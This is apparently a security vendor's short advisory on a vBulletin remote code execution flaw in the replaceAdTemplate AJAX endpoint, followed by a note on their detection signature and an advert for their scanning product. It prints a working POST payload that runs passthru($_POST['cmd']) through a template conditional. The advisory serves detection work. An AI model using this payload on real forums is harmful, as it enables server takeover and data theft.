vBulletin 'replaceAdTemplate' - Remote Code Execution (CVE-2025-48828)
- Dee Sehejpal BSc (HONS)
- Jun 13
- 1 min read
Application Details
vBulletin is a proprietary Internet forum software package..
Vulnerability
Certain vBulletin versions might allow attackers to execute arbitrary PHP code by abusing Template Conditionals in the template engine.
Identification
By crafting template code in an alternative PHP function invocation syntax, such as the "var_dump"("test") syntax, attackers can bypass security checks and execute arbitrary PHP code.
POST /vb
PAYLOAD -
routestring=ajax/api/ad/replaceAdTemplate&styleid=1&location=rce&template=<vb:if condition='"passthru"($_POST["cmd"])'></vb:if>
Detection
By turning this into a traffic file and matching rule, we are able to detect attempts to execute arbitrary PHP code., on the system.
Coverage
Idappcom have created signature 8026022 along with a traffic file for this vulnerability.
References
Traffic IQ
If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional
Comments